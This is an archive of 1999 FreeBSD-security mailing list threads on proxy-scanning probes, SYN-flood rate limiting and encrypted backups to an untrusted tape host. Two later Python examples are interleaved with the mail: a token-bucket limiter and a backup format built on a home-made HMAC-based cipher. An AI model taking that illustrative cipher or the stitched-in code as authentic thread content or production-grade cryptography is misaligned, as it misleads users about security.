> > 
> > In this particular case, it's a site in China. They have a heavily
> > censored internet gateway, and I see lots of probes from china (and other
> > areas in Asia that have enforced proxy use and heavily censored feeds)
> > looking for *:1080 (socks), *:3128 (squid) and *:8080 (squid and/or other
> > proxies including netscape). They are scanning for relays to bounce
> > connections off to bypass the censored feed.
> > 
> Just to make sure I'm getting this right - you're saying China
> has a censored internet gateway (i.e. blocking *something* [what
> exactly ?] ), but they do allow connections to ports 1080, 3128
> and 8080 ?

They block access to sites, not to ports. In particular, sites that
carry capitalist misinformation, or what we in the free world call
"news."

-- 
"Where am I, and what am I doing in this handbasket?"
Wes Peters                                                Softweyr LLC
http://www.softweyr.com/~softweyr                      wes@softweyr.com

From owner-freebsd-security Sun May 16 03:14:58 1999
Date: Sun, 16 May 1999 13:13:06 +0300 (EEST)
From: Narvi
To: Harold Gutch
Cc: Peter Wemm, Kris Kennaway, Matthew Dillon, danny, freebsd-security@FreeBSD.ORG
Subject: Re: network scan?
In-Reply-To: <19990516042657.A28280@foobar.franken.de>
Message-ID:

On Sun, 16 May 1999, Harold Gutch wrote:

> On Sun, May 16, 1999 at 04:41:56AM +0800, Peter Wemm wrote:
> > Kris Kennaway wrote:
> > > On Wed, 12 May 1999, Matthew Dillon wrote:
> > > 
> > > > :May 12 18:42:24 server /kernel: ipfw: 26000 Deny TCP 202.38.248.205:4359
> > > > :a.b.c.1:1080 in via ed0
> > > > :...
> > > > 
> > > > I get this all the time from people scanning for netbios. I
> > > > usually just ignore them. If I'm in a bad mood I send a nasty gram
> > > > to the originating network.
> > > 
> > > In this case they're looking for an open SOCKS proxy (so they can use it to
> > 
> > In this particular case, it's a site in China. They have a heavily
> > censored internet gateway, and I see lots of probes from china (and other
> > areas in Asia that have enforced proxy use and heavily censored feeds)
> > looking for *:1080 (socks), *:3128 (squid) and *:8080 (squid and/or other
> > proxies including netscape). They are scanning for relays to bounce
> > connections off to bypass the censored feed.
> > 
> Just to make sure I'm getting this right - you're saying China
> has a censored internet gateway (i.e. blocking *something* [what
> exactly ?] ), but they do allow connections to ports 1080, 3128
> and 8080 ?
> 

Where's the hard part? They censor "web traffic" (you know, that big
bad evil thing). That there may be other "not so straightforward" ways
to get the same thing is something else entirely.

> bye,
>   Harold
> 
> -- 
> Sleep is an abstinence syndrome which occurs due to lack of caffeine.
> Wed Mar 4 04:53:33 CET 1998  #unix, ircnet
> 

Sander

There is no love, no good, no happiness and no future -
all these are just illusions.

From owner-freebsd-security Sun May 16 05:57:13 1999
Message-Id: <199905161255.AAA02632@aniwa.sky>
To: Wes Peters
Cc: Harold Gutch, freebsd-security@FreeBSD.ORG
Subject: Re: network scan? (no FreeBSD content)
In-reply-to: Your message of "Sat, 15 May 1999 22:18:05 CST." <373E46FD.72E41F3F@softweyr.com>
Date: Mon, 17 May 1999 00:55:26 +1200
From: Andrew McNaughton

> > > In this particular case, it's a site in China. They have a heavily
> > > censored internet gateway, and I see lots of probes from china (and other
> > > areas in Asia that have enforced proxy use and heavily censored feeds)
> > > looking for *:1080 (socks), *:3128 (squid) and *:8080 (squid and/or other
> > > proxies including netscape). They are scanning for relays to bounce
> > > connections off to bypass the censored feed.
> > > 
> > Just to make sure I'm getting this right - you're saying China
> > has a censored internet gateway (i.e. blocking *something* [what
> > exactly ?] ), but they do allow connections to ports 1080, 3128
> > and 8080 ?
> 
> They block access to sites, not to ports. In particular, sites that
> carry capitalist misinformation, or what we in the free world call
> "news."

As someone in the business of running a political news website, I find
most of it fits the description of 'capitalist misinformation' rather
well. The difference if there is one is that dissenting voices exist as
well, and are not punished, though their material is greatly
outnumbered. The rich pay for lots of highly skilled people to say what
the rich want people to hear.

The idea that news is written by journalists is mostly a myth.
Journalists mostly reprocess news from press releases written by Public
Relations firms, spin doctors and pressure groups. What they do write is
tempered by the need to keep on the right side of the people who provide
the bulk of the news they sell.

Blocking access by site seems like it would mean that accessible
information would come mostly from the masses of smaller sites, and
probably be much more balanced overall. The strength of the net has
always been in its broad base, and not in a few big sites (possibly
excepting the search engines).

Andrew McNaughton

PS. A bit off topic really. Sorry.

-- 
-----------
Andrew McNaughton
andrew@squiz.co.nz
http://www.newsroom.co.nz/

From owner-freebsd-security Sun May 16 10:16:20 1999
Date: Sun, 16 May 1999 10:16:17 -0700 (PDT)
From: Richard Steenbergen
To: security@freebsd.org
Subject: Re: SYN floods against FreeBSD (fwd)
Message-ID:

> I think this patch is a bad idea.
> 
> I recall fixing a bug in the route table code that could cause a
> double-free panic, but I do not remember if it was before or after
> the 3.1 release. In anycase, a double-free panic has nothing to do
> with a high volume of SYN traffic apart from ticking some new bug.
> The appropriate fix is *not* to try to limit the sync traffic but
> instead to track down, locate, and fix the double-free.
> 
> I will go over the route table code to see if the softclock interrupt
> is being properly masked while the route table is being manipulated.

The SYN rate limit patch was not intended to address the double free
problem or the backlogging of incoming incomplete handshakes. It was
done for one purpose and one purpose only, CPU. When you are being hit
with 100kpps (which is not terribly unheard of against EFNet IRC
servers), all the queueing in the world isn't going to help (imagine
trying to do MD5 hashing like this?). At a certain point, the goal
shifts from "how do we keep this service alive for new connections" to
"how do we keep the existing connections alive". Prior to this the only
effective defense against such high bandwidth attacks was Committed
Access Rates on the router, which has been cost & cpu prohibitive for a
number of people. The fact that not processing syns past a certain
amount keeps the machine from panicking is simply a nice side effect
until the true cause of the problem can be fixed.

What I would like to see done with all this rate limiting stuff
(icmp_bandlim also) is an interface similar to cisco's CAR, through
ipfw, with the ability to limit any protocol, with any set of matching
rules, via any interface, with the ability to specify actions for
conform/exceed behaviors, and the ability to burst higher for small
amounts of time. Probably a pipe dream. =)

-- 
Richard Steenbergen   humble@EFNet   PGP ID: 0x741D0374
PGP Key Fingerprint: C6EF EFA0 83B2 071F 1AB6 B879 1F70 4303 741D 0374
http://users.quadrunner.com/humble

From owner-freebsd-security Sun May 16 17:18:12 1999
Date: Mon, 17 May 1999 12:14:19 +1200
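A token-bucket limiter with the shape Richard describes (match rules, a sustained rate, a burst allowance, and separate conform/exceed actions), as an added example in Python rather than anything ipfw, icmp_bandlim or Cisco CAR actually implement. Integer milli-tokens keep the arithmetic exact; the rule set, the traffic mix and the addresses (documentation ranges) are constructed for the demonstration:

```python
from dataclasses import dataclass, field
from typing import Callable, List


@dataclass
class Packet:
    t_ms: int            # arrival time in whole milliseconds, so the bucket maths is exact
    proto: str           # "tcp", "udp" or "icmp"
    src: str
    dst: str
    dport: int = 0
    flags: str = ""      # TCP flags: "S" for a bare SYN, "A" for an ACK


@dataclass
class Rule:
    name: str
    match: Callable[[Packet], bool]
    rate: int                   # sustained packets per second
    burst: int                  # bucket depth in packets: how far a short burst may exceed the rate
    exceed: str = "drop"        # "drop", or "log" (forward anyway but record the event)
    _tokens: int = field(init=False, default=0)     # milli-tokens; 1000 == one packet
    _last_ms: int = field(init=False, default=0)

    def __post_init__(self):
        self._tokens = self.burst * 1000            # a fresh bucket starts full

    def conform(self, t_ms: int) -> bool:
        """Refill for the time elapsed, then try to take one packet's worth of tokens."""
        refill = self.rate * (t_ms - self._last_ms)  # rate tokens/s == rate milli-tokens/ms
        self._tokens = min(self.burst * 1000, self._tokens + refill)
        self._last_ms = t_ms
        if self._tokens >= 1000:
            self._tokens -= 1000
            return True
        return False


def run(rules: List[Rule], packets: List[Packet]):
    """First matching rule wins, as in an ipfw rule list; unmatched traffic is permitted."""
    forwarded, logs = [], []
    stats = {r.name: [0, 0] for r in rules}               # [conform, exceed] per rule
    for pkt in sorted(packets, key=lambda p: p.t_ms):     # stable: same-tick order is kept
        for rule in rules:
            if not rule.match(pkt):
                continue
            if rule.conform(pkt.t_ms):
                stats[rule.name][0] += 1
                forwarded.append(pkt)
            else:
                stats[rule.name][1] += 1
                if rule.exceed == "log":
                    logs.append(f"t={pkt.t_ms}ms {rule.name}: rate exceeded by {pkt.src}")
                    forwarded.append(pkt)
            break
        else:
            forwarded.append(pkt)
    return forwarded, {k: tuple(v) for k, v in stats.items()}, logs


def default_rules() -> List[Rule]:
    return [
        Rule("syn-port80", lambda p: p.proto == "tcp" and p.dport == 80 and p.flags == "S",
             rate=50, burst=20, exceed="drop"),
        Rule("icmp", lambda p: p.proto == "icmp", rate=10, burst=5, exceed="log"),
    ]


def sample_traffic() -> List[Packet]:
    """Constructed mix: a 100-SYN burst, ACKs of established sessions, and a few pings."""
    syns = [Packet(t, "tcp", "203.0.113.7", "198.51.100.1", 80, "S") for t in range(100)]
    acks = [Packet(5 + 10 * i, "tcp", "192.0.2.20", "198.51.100.1", 80, "A") for i in range(10)]
    pings = [Packet(0, "icmp", "192.0.2.30", "198.51.100.1") for _ in range(8)]
    return syns + acks + pings


def demo():
    forwarded, stats, logs = run(default_rules(), sample_traffic())
    return stats, len(forwarded), len(logs)


if __name__ == "__main__":
    print(demo())
```

With rate=50 and burst=20, the 100 SYNs arriving one per millisecond get 24 through (the 20-packet burst plus the 4 whole tokens refilled during those 99 ms) and 76 are dropped, while the ACKs of established connections match no rule and are untouched; that separation is the "keep the existing connections alive" goal in the message above. The ICMP rule shows the other exceed action: traffic over the limit is still forwarded but the excess is logged.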
From: nr1@ihug.co.nz
Message-Id: <199905170014.MAA18766@smtp1.ihug.co.nz>
To: freebsd-security@freebsd.org
Subject: secure backup

Can anyone recommend how I should go about creating a backup to an
untrusted machine that has the tape drive, and using an untrusted
network.

I'm a bit wary of encrypting the output of tar or dump, as a single byte
error would make the rest of the backup useless. I'd like to encrypt
(pgp?) each file separately as I go, so that a corrupted byte affects
only one file on retrieval. Is there an existing way to do this, or
should I hack tar or dump into doing it?

From owner-freebsd-security Sun May 16 17:46:41 1999
Message-Id: <4.1.19990516173306.00a7fa20@mail-r>
Date: Sun, 16 May 1999 17:46:52 -0700
To: Wes Peters
From: Ludwig Pummer
Subject: warning concerning a public proxy [was Re: network scan?]
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: <373E0CB2.D98C9E75@softweyr.com>

At 05:09 PM 5/15/1999 , Wes Peters wrote:
>An anonymous gateway service to sites like cnn.com and abcnews.com
>might go a long way to helping some of these people. I don't have
>the connectivity (yet), but I may have soon; TCI will finally get
>digital cable to me day after tomorrow, and @Home shouldn't be too
>far away.
>
>Can anyone else throw up a "public proxy" on a standalone machine?

Applause for your noble intentions, but the @Home AUP ( www.home.net/aup/ )
prohibits running services for other people (and in some cases, for
yourself). Web server, email servers, FTP servers, and IP tunneling are
expressly prohibited.

I'm not saying it's impossible to run a server off @Home. It's just that
if you do, you have to be careful not to attract too much attention. If
your public proxy is suddenly eating up all of your neighborhood's
bandwidth (and it will eat it up because upload bandwidth is considerably
lower than download, and once word of a public proxy like yours gets out,
it will be used heavily), @Home will be sure to notice. Setting up a
public proxy might feel real good, but it won't any more after @Home
cancels your account.

--Ludwig Pummer ( ludwigp@bigfoot.com ) ICQ UIN: 692441

From owner-freebsd-security Sun May 16 17:55:18 1999
Message-ID: <006b01be9fff$ee9176e0$7271a1ce@tasam.com>
From: "Joe Gleason"
To: ,
References: <199905170014.MAA18766@smtp1.ihug.co.nz>
Subject: Re: secure backup
Date: Sun, 16 May 1999 20:55:08 -0400
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2314.1300
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I back up my workstation by piping tar output through pgp. I never thought about the data error possibility. I would be inclined to let TCP handle it.

If that doesn't meet your needs, you could set up something completely insane with shell scripting. (My answer to every problem.)

The script could do something like this: on the machine with the files to back up (I'll call it A), it will run a find, and do a for loop on the output of that find. For each of these files, it will pgp the file and send it to B (the system receiving the backup).

The sending can go something like this: A connects to B on port x and sends the filename that it is about to send. Then A connects to B on port y and sends the data. B saves the file that it receives on y under the name it was given on x and then adds this file to a tarball.

This connection from A to B can be done via faucet and hose.

This way, the final product will be a tarball on B that has each file encrypted and separate.

There would be a lot of security issues in making sure that A cannot be spoofed to send odd things to B to compromise it via ports x and y, but that could be handled with setting the remote host in faucet, maybe ipfw and general sanity checks on anything coming into B.

My ramblings for the day.

Joe Gleason
Tasam

----- Original Message -----
From: To: Sent: Sunday, May 16, 1999 20:14 Subject: secure backup > Can anyone recommend how I should go about creating a backup to an untrusted > machine that has the tape drive, and using an untrusted network. > > I'm a bit wary of encrypting the output of tar or dump, as a single byte error > would make the rest of the backup useless. I'd like to encrypt (pgp?) each > file separately as I go, so that a corrupted byte affects only one file on > retrieval. Is there an existing way to do this, or should I hack tar or dump > into doing it? > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 16 17:57: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from mojo.calyx.net (mojo.calyx.net [208.132.136.2]) by hub.freebsd.org (Postfix) with SMTP id CF33214BED for ; Sun, 16 May 1999 17:56:58 -0700 (PDT) (envelope-from lists@mojo.calyx.net) Received: (qmail 1649 invoked from network); 17 May 1999 00:56:58 -0000 Received: from mojo.calyx.net (lists@208.132.136.2) by mojo.calyx.net with SMTP; 17 May 1999 00:56:58 -0000 Date: Sun, 16 May 1999 20:56:58 -0400 (EDT) 
From: Nicholas Merrill
To: Joe Gleason
Cc: nr1@ihug.co.nz, freebsd-security@FreeBSD.ORG
Subject: Re: secure backup
In-Reply-To: <006b01be9fff$ee9176e0$7271a1ce@tasam.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

you could try substituting BRU (www.estinc.com) for tar. BRU is much better at recovering from errors, and does checksums

----------------------------------------------------------------------------
Nicholas Merrill http://www.calyx.net Voice: 212-966-1900
President / CEO http://www.calyx.nl Fax : 212-966-3965
Calyx Internet Access 13 Laight St. NYC, NY 10013 Email: nick@calyx.net
----------------------------------------------------------------------------

On Sun, 16 May 1999, Joe Gleason wrote:

> I back up my workstation by piping tar output through pgp. I never
> thought about the data error possibility. I would be inclined to let
> TCP handle it.
>
> If that doesn't meet your needs, you could set up something completely
> insane with shell scripting. (My answer to every problem.)
>
> The script could do something like this,
> on the machine with the files to back up (I'll call it A)
>
> it will run a find, and do a for loop on the output of that find. For
> each of these files, it will pgp the file and send it to B (system
> receiving backup)
>
> The sending can go something like this, A connects to B on port x and
> sends the filename that it is about to send. Then A connects to B on
> port y and sends the data. B saves the file that it receives on y as
> the name it was given on x and then adds this file to a tarball.
>
> This connection from A to B can be done via faucet and hose.
>
> This way, the final product will be a tarball on B that has each file
> encrypted and separate.
>
> There would be a lot of security issues in making sure that A cannot be
> spoofed to send odd things to B to compromise it via ports x and y,
> but that could be handled with setting the remote host in faucet,
> maybe ipfw and general sanity checks on anything coming into B.
>
> My ramblings for the day.
>
> Joe Gleason
> Tasam
>
> ----- Original Message -----
> From:
> To:
> Sent: Sunday, May 16, 1999 20:14
> Subject: secure backup
>
>
> > Can anyone recommend how I should go about creating a backup to an
> untrusted
> > machine that has the tape drive, and using an untrusted network.
> >
> > I'm a bit wary of encrypting the output of tar or dump, as a single
> byte error
> > would make the rest of the backup useless. I'd like to encrypt
> (pgp?) each
> > file separately as I go, so that a corrupted byte affects only one
> file on
> > retrieval. Is there an existing way to do this, or should I hack
> tar or dump
> > into doing it?

From owner-freebsd-security Sun May 16 17:58:41 1999
Delivered-To: freebsd-security@freebsd.org
Received: from tasam.com (tasam.com [206.161.83.22]) by hub.freebsd.org (Postfix) with ESMTP id DCE5D14BED for ; Sun, 16 May 1999 17:58:38 -0700 (PDT) (envelope-from freebsd.list@bug.tasam.com)
Received: from bug (bug.tasam.com [206.161.113.114]) by tasam.com (8.9.3/8.9.1) with SMTP id UAA15848; Sun, 16 May 1999 20:58:25 -0400 (EDT)
Message-ID: <008101bea000$637a5bc0$7271a1ce@tasam.com>
From: "Joe Gleason"
To: "Nicholas Merrill"
Cc: ,
References:
Subject: Re: secure backup
Date: Sun, 16 May 1999 20:58:30 -0400
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2314.1300
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

But that wouldn't be nearly as much fun!

----- Original Message -----
From: Nicholas Merrill
To: Joe Gleason
Cc: ;
Sent: Sunday, May 16, 1999 20:56
Subject: Re: secure backup

>
> you could try substituting BRU (www.estinc.com) for tar. BRU is much
> better at recovering from errors, and does checksums
>
> ----------------------------------------------------------------------------
> Nicholas Merrill http://www.calyx.net Voice: 212-966-1900
> President / CEO http://www.calyx.nl Fax : 212-966-3965
> Calyx Internet Access 13 Laight St. NYC, NY 10013 Email: nick@calyx.net
> ----------------------------------------------------------------------------
>
> On Sun, 16 May 1999, Joe Gleason wrote:
>
> > I back up my workstation by piping tar output through pgp. I never
> > thought about the data error possibility. I would be inclined to let
> > TCP handle it.
> >
> > If that doesn't meet your needs, you could set up something completely
> > insane with shell scripting. (My answer to every problem.)
> >
> > The script could do something like this,
> > on the machine with the files to back up (I'll call it A)
> >
> > it will run a find, and do a for loop on the output of that find. For
> > each of these files, it will pgp the file and send it to B (system
> > receiving backup)
> >
> > The sending can go something like this, A connects to B on port x and
> > sends the filename that it is about to send. Then A connects to B on
> > port y and sends the data. B saves the file that it receives on y as
> > the name it was given on x and then adds this file to a tarball.
> >
> > This connection from A to B can be done via faucet and hose.
> >
> > This way, the final product will be a tarball on B that has each file
> > encrypted and separate.
> >
> > There would be a lot of security issues in making sure that A cannot be
> > spoofed to send odd things to B to compromise it via ports x and y,
> > but that could be handled with setting the remote host in faucet,
> > maybe ipfw and general sanity checks on anything coming into B.
> > > > My ramblings for the day. > > > > Joe Gleason > > Tasam > > > > ----- Original Message ----- > > From: > > To: > > Sent: Sunday, May 16, 1999 20:14 > > Subject: secure backup > > > > > > > Can anyone recommend how I should go about creating a backup to an > > untrusted > > > machine that has the tape drive, and using an untrusted network. > > > > > > I'm a bit wary of encrypting the output of tar or dump, as a single > > byte error > > > would make the rest of the backup useless. I'd like to encrypt > > (pgp?) each > > > file separately as I go, so that a corrupted byte affects only one > > file on > > > retrieval. Is there an existing way to do this, or should I hack > > tar or dump > > > into doing it? > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 16 18:51:27 1999 Delivered-To: freebsd-security@freebsd.org Received: from alecto.physics.uiuc.edu (alecto.physics.uiuc.edu [130.126.8.20]) by hub.freebsd.org (Postfix) with ESMTP id D506F14FC7 for ; Sun, 16 May 1999 18:51:25 -0700 (PDT) (envelope-from igor@alecto.physics.uiuc.edu) Received: (from igor@localhost) by alecto.physics.uiuc.edu (8.9.0/8.9.0) id UAA04558; Sun, 16 May 1999 20:51:19 -0500 (CDT) 
From: Igor Roshchin
Message-Id: <199905170151.UAA04558@alecto.physics.uiuc.edu>
Subject: Re: secure backup
In-Reply-To: <199905170014.MAA18766@smtp1.ihug.co.nz> from "nr1@ihug.co.nz" at "May 17, 1999 12:14:19 pm"
To: nr1@ihug.co.nz
Date: Sun, 16 May 1999 20:51:19 -0500 (CDT)
Cc: freebsd-security@freebsd.org
X-Mailer: ELM [version 2.4ME+ PL43 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

If both machines are Unix, you can use SSH.

I am using the following script (from the machine that I back up). (Written for FreeBSD, so you might want to optimize it differently; if you are using some other Unix, you might want to adjust the size of the buffer.)

-------------------------------
#!/bin/csh -f
#
# $SSH is the remote half of every pipeline below: log in to the tape host as
# the backup user with the named key and hand stdin to dd, which writes it to
# the no-rewind tape device.  -c none turns the ssh cipher off; the RSA key
# authentication still happens.
set SSH="ssh -c none -i /local-path-to-private/key backup@tape-machine.com /bin/dd bs=64k of=/dev/nrst0"
echo starting MyMachine
date
# Level 0 dump of each filesystem to stdout (f -), recorded in /etc/dumpdates (u),
# in 64 KB blocks (b); s and d describe the tape so dump knows its capacity.
dump 0ubsdf 64 61000 100000 - / | /bin/dd bs=64k | $SSH
dump 0ubsdf 64 61000 100000 - /usr | /bin/dd bs=64k | $SSH
dump 0ubsdf 64 61000 100000 - /var | /bin/dd bs=64k | $SSH
dump 0ubsdf 64 61000 100000 - /mail | /bin/dd bs=64k | $SSH
--------------------------------

("backup" is the account of the user on the machine "tape-machine.com", the one which has the tape drive attached.)

Hope this helps,

IgoR

> Can anyone recommend how I should go about creating a backup to an untrusted
> machine that has the tape drive, and using an untrusted network.
>
> I'm a bit wary of encrypting the output of tar or dump, as a single byte error
> would make the rest of the backup useless. I'd like to encrypt (pgp?) each
> file separately as I go, so that a corrupted byte affects only one file on
> retrieval. Is there an existing way to do this, or should I hack tar or dump
> into doing it?
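The question quoted just above (encrypt each file separately, so that a corrupted byte on the tape spoils only one file) and Joe Gleason's earlier sketch of a filename-plus-data record per file can be made concrete in a small container format. The following Python is an added example written for this page; it is not code from the thread, from any of its authors, or from any FreeBSD tool. The archive layout, the record marker bytes and the use of HMAC-SHA256 in counter mode as the per-file cipher are illustration-only choices made so that it runs with the standard library alone; in practice each record's ciphertext would come from pgp or bdes and only the framing and the resynchronisation logic would be kept. What the framing buys is visible in the restore loop: a record whose tag fails, or whose length field has been hit, is reported and skipped, and reading continues at the next marker instead of desynchronising for the rest of the stream.

```python
"""Per-file encrypted backup container with per-record integrity and resync.

Added example for this page; not code from the thread or from any FreeBSD tool.
Every file is an independent record with its own random nonce, its own
keystream and its own authentication tag, so a corrupted byte on the tape
damages only the record it lands in.  The cipher is HMAC-SHA256 run in counter
mode (standard library only) and stands in for pgp/bdes; the framing is the point.
"""
import hashlib
import hmac
import os
import struct
from typing import Dict, List, Optional, Tuple

MAGIC = b"PFA1"             # archive header; assumed format name, not a real tool's
MARK = b"\x00REC\xff"       # record sync marker, used to resynchronise after damage
NONCE_LEN, TAG_LEN, SALT_LEN = 16, 32, 16


def derive_keys(passphrase: bytes, salt: bytes) -> Tuple[bytes, bytes]:
    """Stretch the passphrase into separate encryption and MAC keys."""
    km = hashlib.pbkdf2_hmac("sha256", passphrase, salt, 100_000, dklen=64)
    return km[:32], km[32:]


def keystream_xor(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Counter mode over HMAC-SHA256: keystream block i = HMAC(key, nonce || i)."""
    out = bytearray()
    for i in range(0, len(data), 32):
        block = hmac.new(key, nonce + struct.pack(">Q", i // 32), "sha256").digest()
        out += bytes(a ^ b for a, b in zip(data[i:i + 32], block))
    return bytes(out)


def encode_record(enc_key: bytes, mac_key: bytes, name: str, data: bytes) -> bytes:
    """MARK | name_len | name | nonce | data_len | ciphertext | tag  (encrypt-then-MAC).
    The name travels in the clear, as it does on "port x" in the scheme above."""
    nonce, name_b = os.urandom(NONCE_LEN), name.encode()
    ct = keystream_xor(enc_key, nonce, data)
    body = struct.pack(">H", len(name_b)) + name_b + nonce + struct.pack(">Q", len(ct)) + ct
    return MARK + body + hmac.new(mac_key, body, "sha256").digest()


def create_archive(passphrase: bytes, files: Dict[str, bytes]) -> bytes:
    """MAGIC | salt | records...  Each file is encrypted and authenticated on its own."""
    salt = os.urandom(SALT_LEN)
    enc_key, mac_key = derive_keys(passphrase, salt)
    return MAGIC + salt + b"".join(encode_record(enc_key, mac_key, n, d) for n, d in files.items())


def _parse_record(buf: bytes, pos: int):
    """(name, end, nonce, ciphertext, tag) for the record at pos, or None if its lengths are implausible."""
    p = pos + len(MARK)
    if buf[pos:p] != MARK or p + 2 > len(buf):
        return None
    (name_len,) = struct.unpack_from(">H", buf, p)
    p += 2
    name, p = buf[p:p + name_len], p + name_len
    nonce, p = buf[p:p + NONCE_LEN], p + NONCE_LEN
    if p + 8 > len(buf):
        return None
    (data_len,) = struct.unpack_from(">Q", buf, p)
    p += 8
    if p + data_len + TAG_LEN > len(buf):
        return None
    ct, p = buf[p:p + data_len], p + data_len
    return name, p + TAG_LEN, nonce, ct, buf[p:p + TAG_LEN]


def restore(passphrase: bytes, archive: bytes) -> List[Tuple[str, Optional[bytes]]]:
    """Decrypt every intact record; a damaged one is reported as (name, None) and skipped."""
    if archive[:len(MAGIC)] != MAGIC:
        raise ValueError("not a PFA1 archive")
    salt = archive[len(MAGIC):len(MAGIC) + SALT_LEN]
    enc_key, mac_key = derive_keys(passphrase, salt)
    out, pos = [], archive.find(MARK)
    while 0 <= pos < len(archive):
        parsed = _parse_record(archive, pos)
        if parsed is not None:
            name, end, nonce, ct, tag = parsed
            body = archive[pos + len(MARK):end - TAG_LEN]
            if hmac.compare_digest(hmac.new(mac_key, body, "sha256").digest(), tag):
                out.append((name.decode(errors="replace"), keystream_xor(enc_key, nonce, ct)))
                pos = end
                continue
            label = name.decode(errors="replace")
        else:
            label = "<unparseable>"
        # Bad tag or nonsensical length field: do not trust this record's lengths;
        # report it and resynchronise on the next marker.  (A marker occurring by
        # chance inside ciphertext is the 2**-40-per-byte price of this scheme.)
        out.append((label, None))
        pos = archive.find(MARK, pos + 1)
    return out


def record_offsets(archive: bytes) -> List[int]:
    """Start offset of every record marker; handy for simulating tape damage."""
    offs, pos = [], archive.find(MARK)
    while pos >= 0:
        offs.append(pos)
        pos = archive.find(MARK, pos + 1)
    return offs
```

Length fields are the weak point of any variable-length framing, which is why the marker is there; fixed-size records, as tar and dump already use, avoid the issue at the cost of padding. File names are stored in the clear, as they are in the port-x/port-y scheme; if that matters, put the name inside the encrypted payload and keep only a record number outside.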
> > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 16 19:10: 7 1999 Delivered-To: freebsd-security@freebsd.org Received: from weathership.homeport.org (breakwater.homeport.org [216.67.13.2]) by hub.freebsd.org (Postfix) with ESMTP id BECF015059 for ; Sun, 16 May 1999 19:10:01 -0700 (PDT) (envelope-from adam@weathership.homeport.org) Received: (from adam@localhost) by weathership.homeport.org (8.8.8/8.8.5) id WAA01870; Sun, 16 May 1999 22:23:25 -0400 (EDT) Date: Sun, 16 May 1999 22:23:25 -0400 
From: Adam Shostack
To: Igor Roshchin
Cc: nr1@ihug.co.nz, freebsd-security@FreeBSD.ORG
Subject: Re: secure backup
Message-ID: <19990516222325.A1851@weathership.homeport.org>
References: <199905170014.MAA18766@smtp1.ihug.co.nz> <199905170151.UAA04558@alecto.physics.uiuc.edu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95.3i
In-Reply-To: <199905170151.UAA04558@alecto.physics.uiuc.edu>; from Igor Roshchin on Sun, May 16, 1999 at 08:51:19PM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

ssh does not help; the host the tape is attached to is untrusted.

Adam

On Sun, May 16, 1999 at 08:51:19PM -0500, Igor Roshchin wrote:
|
|
| If both machines are Unix - you can use SSH.
|
| I am using the following script:
| (from the machine that I back up)
| (Written for FreeBSD - so, you might want to optimize it differently -
| if you are using some other Unix - you might want to adjust the size of the buffer)
|
| -------------------------------
| #!/bin/csh -f
| #
| set SSH="ssh -c none -i /local-path-to-private/key backup@tape-machine.com /bin/dd bs=64k of=/dev/nrst0"
| echo starting MyMachine
| date
| dump 0ubsdf 64 61000 100000 - / | /bin/dd bs=64k | $SSH
| dump 0ubsdf 64 61000 100000 - /usr | /bin/dd bs=64k | $SSH
| dump 0ubsdf 64 61000 100000 - /var | /bin/dd bs=64k | $SSH
| dump 0ubsdf 64 61000 100000 - /mail | /bin/dd bs=64k | $SSH
| --------------------------------
|
|
| (backup - is the account of the user on the machine "tape-machine.com" -
| the one which has the tape drive attached)
|
| Hope, this helps,
|
| IgoR
|
| > Can anyone recommend how I should go about creating a backup to an untrusted
| > machine that has the tape drive, and using an untrusted network.
| >
| > I'm a bit wary of encrypting the output of tar or dump, as a single byte error
| > would make the rest of the backup useless. I'd like to encrypt (pgp?)
